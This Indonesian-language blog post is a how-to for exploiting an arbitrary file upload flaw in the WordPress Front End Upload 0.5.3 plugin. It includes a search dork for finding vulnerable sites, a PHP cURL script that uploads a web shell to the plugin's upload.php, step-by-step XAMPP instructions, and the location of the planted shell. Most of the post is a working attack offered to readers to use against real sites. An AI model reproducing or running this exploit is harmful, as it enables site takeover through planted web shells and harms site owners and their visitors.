Support By :


http://vyzewitch.blogspot.com/

http://vyzewitch.blogspot.com/

Wordpress Front End Upload 0.5.3 Arbitrary File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:wp-content/plugins/front-end-upload/

3).Jika Ketemu Masukan Exploit /wp-content/plugins/front-end-upload/upload.php

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D


$u="namashell.php";
$c = curl_init("http://site.com/wp-content/plugins/front-end-upload/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>


4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D

10).Untuk Letak Shellnya Ada Di
http://site.com/
wp-content/uploads/iti_feu_uploads/shell.php

Penulis : Ferry PG ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Wordpress Front End Upload 0.5.3 Arbitrary File Upload ini dipublish oleh Ferry PG pada hari 20 Nov 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Wordpress Front End Upload 0.5.3 Arbitrary File Upload
 

0 komentar: